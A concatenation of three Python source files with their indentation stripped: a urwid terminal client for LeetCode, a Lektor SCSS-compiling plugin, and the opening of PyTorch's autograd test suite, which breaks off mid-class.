from views.viewhelper import *
from views.result import ResultView
from .config import config
import auth
from .code import *
palette = [
('body', 'dark cyan', ''),
('focus', 'white', ''),
('head', 'white', 'dark gray'),
('lock', 'dark gray', ''),
('tag', 'white', 'light cyan', 'standout'),
('hometag', 'dark red', ''),
('accepted', 'dark green', '')
]
class Terminal(object):
def __init__(self):
self.home_view = None
self.loop = None
self.leetcode = Leetcode()
self.help_view = None
self.quit_confirm_view = None
self.submit_confirm_view = None
self.view_stack = []
self.detail_view = None
self.search_view = None
self.loading_view = None
self.logger = logging.getLogger(__name__)
@property
def current_view(self):
return None if not len(self.view_stack) else self.view_stack[-1]
@property
def is_home(self):
return len(self.view_stack) == 1
def goto_view(self, view):
self.loop.widget = view
self.view_stack.append(view)
def go_back(self):
self.view_stack.pop()
self.loop.widget = self.current_view
def keystroke(self, key):
if self.quit_confirm_view and self.current_view == self.quit_confirm_view:
if key == 'y':
raise urwid.ExitMainLoop()
else:
self.go_back()
elif self.submit_confirm_view and self.current_view == self.submit_confirm_view:
self.go_back()
if key == 'y':
self.send_code(self.detail_view.quiz)
elif self.current_view == self.search_view:
if key == 'enter':
text = self.search_view.contents[1][0].original_widget.get_edit_text()
self.home_view.handle_search(text)
self.go_back()
elif key == 'esc':
self.go_back()
elif key in ('q', 'Q'):
self.goto_view(self.make_quit_confirmation())
elif key == 's':
if not self.is_home:
self.goto_view(self.make_submit_confirmation())
elif not self.is_home and (key == 'left' or key == 'h'):
self.go_back()
elif key == 'H':
if not self.help_view:
self.make_helpview()
self.goto_view(self.help_view)
elif key == 'R':
if self.is_home:
self.reload_list()
elif key == 'f':
if self.is_home:
self.enter_search()
elif key in ('enter', 'right'):
if self.is_home and self.home_view.is_current_item_enterable():
self.enter_detail(self.home_view.get_current_item_data())
else:
return key
def enter_search(self):
self.make_search_view()
self.goto_view(self.search_view)
def enter_detail(self, data):
self.show_loading('Loading Quiz', 17, self.current_view)
self.t = Thread(target=self.run_retrieve_detail, args=(data,))
self.t.start()
def reload_list(self):
'''Press R in home view to retrieve quiz list'''
self.leetcode.load()
if self.leetcode.quizzes and len(self.leetcode.quizzes) > 0:
self.home_view = self.make_listview(self.leetcode.quizzes)
self.view_stack = []
self.goto_view(self.home_view)
def make_quit_confirmation(self):
text = urwid.AttrMap(urwid.Text('Do you really want to quit ? (y/n)'), 'body')
self.quit_confirm_view = urwid.Overlay(text, self.current_view, 'left',
('relative', 100), 'bottom', None)
return self.quit_confirm_view
def make_submit_confirmation(self):
text = urwid.AttrMap(urwid.Text('Do you want to submit your code ? (y/n)'), 'body')
self.submit_confirm_view = urwid.Overlay(text, self.current_view, 'left',
('relative', 100), 'bottom', None)
return self.submit_confirm_view
def make_search_view(self):
text = urwid.AttrMap(urwid.Edit('Search by id: ', ''), 'body')
self.search_view = urwid.Overlay(text, self.current_view, 'left',
('relative', 100), 'bottom', None)
return self.search_view
def make_detailview(self, data):
self.detail_view = DetailView(data, self.loop)
return self.detail_view
def make_listview(self, data):
header = self.make_header()
self.home_view = HomeView(data, header)
return self.home_view
def make_header(self):
if self.leetcode.is_login:
columns = [
('fixed', 15, urwid.Padding(urwid.AttrWrap(
urwid.Text('%s' % config.username),
'head', ''))),
urwid.AttrWrap(urwid.Text('You have solved %d / %d problems. ' %
(len(self.leetcode.solved), len(self.leetcode.quizzes))), 'head', ''),
]
return urwid.Columns(columns)
else:
text = urwid.AttrWrap(urwid.Text('Not login'), 'head')
return text
def make_helpview(self):
self.help_view = HelpView()
return self.help_view
def show_loading(self, text, width, host_view=urwid.SolidFill()):
self.loading_view = LoadingView(text, width, host_view, self.loop)
self.loop.widget = self.loading_view
self.loading_view.start()
def end_loading(self):
if self.loading_view:
self.loading_view.end()
self.loading_view = None
def retrieve_home_done(self, quizzes):
self.home_view = self.make_listview(quizzes)
self.view_stack = []
self.goto_view(self.home_view)
self.end_loading()
delay_refresh(self.loop)
def retrieve_detail_done(self, data):
data.id = self.home_view.listbox.get_focus()[0].data.id
data.url = self.home_view.listbox.get_focus()[0].data.url
self.goto_view(self.make_detailview(data))
self.end_loading()
delay_refresh(self.loop)
def run_retrieve_home(self):
self.leetcode.is_login = auth.is_login()
if not self.leetcode.is_login:
self.leetcode.is_login = auth.login()
if self.loading_view:
self.loading_view.set_text('Loading')
self.leetcode.load()
if self.leetcode.quizzes and len(self.leetcode.quizzes) > 0:
self.retrieve_home_done(self.leetcode.quizzes)
else:
self.end_loading()
toast = Toast('Request fail!', 10, self.current_view, self.loop)
toast.show()
self.logger.error('get quiz list fail')
def run_retrieve_detail(self, quiz):
ret = quiz.load()
if ret:
self.retrieve_detail_done(quiz)
else:
self.end_loading()
toast = Toast('Request fail!', 10, self.current_view, self.loop)
toast.show()
self.logger.error('get detail %s fail', quiz.id)
def run_send_code(self, quiz):
filepath = get_code_file_path(quiz.id)
if not os.path.exists(filepath):
return
code = get_code_for_submission(filepath)
code = code.replace('\n', '\r\n')
success, text_or_id = quiz.submit(code)
if success:
self.loading_view.set_text('Retrieving')
code = 1
while code > 0:
r = quiz.check_submission_result(text_or_id)
code = r[0]
self.end_loading()
if code < -1:
toast = Toast('error: %s' % r[1], 10 + len(r[1]), self.current_view, self.loop)
toast.show()
else:
try:
result = ResultView(quiz, self.detail_view, r[1], loop=self.loop)
result.show()
except ValueError as e:
toast = Toast('error: %s' % e, 10 + len(str(e)), self.current_view, self.loop)
toast.show()
delay_refresh(self.loop)
else:
self.end_loading()
toast = Toast('error: %s' % text_or_id, 10 + len(text_or_id), self.current_view, self.loop)
toast.show()
self.logger.error('send data fail')
def send_code(self, data):
self.show_loading('Sending code', 17, self.current_view)
self.t = Thread(target=self.run_send_code, args=(data,))
self.t.start()
def run(self):
self.loop = urwid.MainLoop(None, palette, unhandled_input=self.keystroke)
self.show_loading('Log In', 12)
self.t = Thread(target=self.run_retrieve_home)
self.t.start()
try:
self.loop.run()
except KeyboardInterrupt:
self.logger.info('Keyboard interrupt')
except Exception as e:
self.logger.exception("Fatal error in main loop")
finally:
self.clear_thread()
sys.exit()
def clear_thread(self):
if self.loading_view:
self.loading_view.end()
if self.t and self.t.is_alive():
self.t.join()
|
lektor_scss.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sass
import errno
import re
from lektor.pluginsystem import Plugin
from termcolor import colored
import threading
import time
COMPILE_FLAG = "scss"
class scssPlugin(Plugin):
name = u'Lektor scss'
description = u'Lektor plugin to compile css out of sass - based on libsass'
def __init__(self, *args, **kwargs):
Plugin.__init__(self, *args, **kwargs)
config = self.get_config()
self.source_dir = config.get('source_dir', 'assets/scss/')
self.output_dir = config.get('output_dir', 'assets/css/')
self.output_style = config.get('output_style', 'compressed')
self.source_comments = config.get('source_comments', 'False')
self.precision = config.get('precision', '5')
self.name_prefix = config.get('name_prefix', '')
self.include_paths = []
raw_include_paths = config.get('include_paths', '')
# convert a path expression with ',' as separator symbol
include_path_list = list(filter(lambda el: len(el) > 0, raw_include_paths.split(',')))
for path in include_path_list:
if path.startswith('/'):
self.include_paths.append(path)
else:
self.include_paths.append(os.path.realpath(os.path.join(self.env.root_path, path)))
self.watcher = None
self.run_watcher = False
def is_enabled(self, build_flags):
return bool(build_flags.get(COMPILE_FLAG))
def find_dependencies(self, target):
dependencies = [target]
with open(target, 'r') as f:
data = f.read()
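# The regex below is meant to pull out the quoted file list of @import statements,
# e.g. a line like  @import 'variables', 'mixins';  yields "'variables', 'mixins';",
# which is then stripped of quotes/semicolons and split on ',' to resolve each name.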
imports = re.findall(r'@import\s+((?:[\'|\"]\S+[\'|\"]\s*(?:,\s*(?:\/\/\s*|)|;))+)', data)
for files in imports:
files = re.sub('[\'\"\n\r;]', '', files)
# find correct filename and add to watchlist (recursive so dependencies of dependencies get added as well)
for file in files.split(","):
file = file.strip()
# when filename ends with css libsass converts it to a url()
if file.endswith('.css'):
continue
basepath = os.path.dirname(target)
filepath = os.path.dirname(file)
basename = os.path.basename(file)
filenames = [
basename,
'_' + basename,
basename + '.scss',
basename + '.css',
'_' + basename + '.scss',
'_' + basename + '.css'
]
for filename in filenames:
path = os.path.join(basepath, filepath, filename)
if os.path.isfile(path):
dependencies += self.find_dependencies(path)
return dependencies
def compile_file(self, target, output, dependencies):
"""
Compiles the target scss file.
"""
filename = os.path.splitext(os.path.basename(target))[0]
if not filename.endswith(self.name_prefix):
filename += self.name_prefix
filename += '.css'
output_file = os.path.join(output, filename)
# check if dependency changed and rebuild if it did
rebuild = False
for dependency in dependencies:
if not os.path.isfile(output_file) or os.path.getmtime(dependency) > os.path.getmtime(output_file):
rebuild = True
break
if not rebuild:
return
result = sass.compile(
filename=target,
output_style=self.output_style,
precision=int(self.precision),
source_comments=(self.source_comments.lower()=='true'),
include_paths=self.include_paths
)
with open(output_file, 'w') as fw:
fw.write(result)
print(colored('css', 'green'), self.source_dir + os.path.basename(target), '\u27a1', self.output_dir + filename)
def find_files(self, destination):
"""
Finds all scss files in the given destination. (ignore files starting with _)
"""
for root, dirs, files in os.walk(destination):
for f in files:
if (f.endswith('.scss') or f.endswith('.sass')) and not f.startswith('_'):
yield os.path.join(root, f)
def thread(self, output, watch_files):
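# Background watcher loop: roughly once per second, re-run compile_file for every
# watched entry point (compile_file itself skips targets whose output is newer than
# all of their dependencies) until run_watcher is cleared by on_server_stop.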
while True:
if not self.run_watcher:
self.watcher = None
break
for filename, dependencies in watch_files:
self.compile_file(filename, output, dependencies)
time.sleep(1)
def on_server_spawn(self, **extra):
self.run_watcher = True
def on_server_stop(self, **extra):
if self.watcher is not None:
self.run_watcher = False
print('stopped')
def make_sure_path_exists(self, path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def on_before_build_all(self, builder, **extra):
try: # lektor 3+
is_enabled = self.is_enabled(builder.extra_flags)
except AttributeError: # lektor 2+
is_enabled = self.is_enabled(builder.build_flags)
# only run when server runs
if not is_enabled or self.watcher:
return
root_scss = os.path.join(self.env.root_path, self.source_dir )
output = os.path.join(self.env.root_path, self.output_dir )
config_file = os.path.join(self.env.root_path, 'configs/scss.ini')
# output path has to exist
#os.makedirs(output, exist_ok=True) when python2 finally runs out
self.make_sure_path_exists(output)
dependencies = []
if os.path.isfile(config_file):
dependencies.append(config_file)
if self.run_watcher:
watch_files = []
for filename in self.find_files(root_scss):
dependencies += self.find_dependencies(filename)
watch_files.append([filename, dependencies])
self.watcher = threading.Thread(target=self.thread, args=(output, watch_files))
self.watcher.start()
else:
for filename in self.find_files(root_scss):
# get dependencies by searching imports in target files
dependencies += self.find_dependencies(filename)
self.compile_file(filename, output, dependencies)
|
test_autograd.py
|
# Owner(s): ["module: autograd"]
import contextlib
import gc
import io
import math
import os
import random
import sys
import tempfile
import threading
import time
import unittest
import uuid
import warnings
import operator
from copy import deepcopy
from collections import OrderedDict
from itertools import product
from operator import mul
from functools import reduce
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, record_function, emit_nvtx)
from torch.autograd.profiler_util import (_format_time, EventList, FunctionEvent, FunctionEventAvg)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing import make_tensor
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (
TestCase, run_tests, skipIfNoLapack, slowTest, IS_WINDOWS, IS_MACOS,
disable_gc, gradcheck, gradgradcheck, parametrize, instantiate_parametrized_tests)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import mask_not_all_zeros
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipMeta)
from torch.testing._internal.common_dtype import get_all_dtypes
from torch.testing._internal.logging_tensor import no_dispatch
import pickle
def graph_desc(fn):
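# Recursively render an autograd graph rooted at `fn` as a nested string of grad_fn
# class names, e.g. something like 'AddBackward0(AccumulateGrad(), AccumulateGrad())'
# for the sum of two leaf tensors that require grad.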
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not as tensors full of zeros
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure gradcheck and gradgradcheck run successfully even if there is
# an unrelated (but differentiable) input
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.atan2, choose a different op
torch.atan2(dual_x, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
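# With create_graph=False the second backward accumulates into x.grad in place,
# so the captured x_grad tensor sees both passes (twice the clone). With
# create_graph=True accumulation happens out of place: x.grad is rebound to a
# new tensor and the captured x_grad still equals the clone from the first pass.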
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is True
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulating a dense gradient into a sparse gradient always changes the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulating a dense gradient into a dense gradient preserves the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulating a sparse gradient into a sparse gradient preserves the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
def test_accumulate_grad_with_zero_numel_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
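# grad_sum = 2 * (2x + y) + (x + 2y) = 5x + 4y, so backpropagating ones through
# it accumulates an extra 5 per element into x.grad and 4 per element into y.grad.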
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.fail("expected a shape-mismatch RuntimeError")
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
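# Take gradients through the non-leaf x repeatedly; torch.autograd.grad must
# return the gradient without ever populating .grad on x or y.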
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that does not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
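# Each intermediate depends only on its own leaf, so d(loss)/d(intermediate)
# can be computed one shard at a time and the pieces fed back through
# torch.autograd.backward below.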
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# With allow_unused=False, any None gradient in the result should raise
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
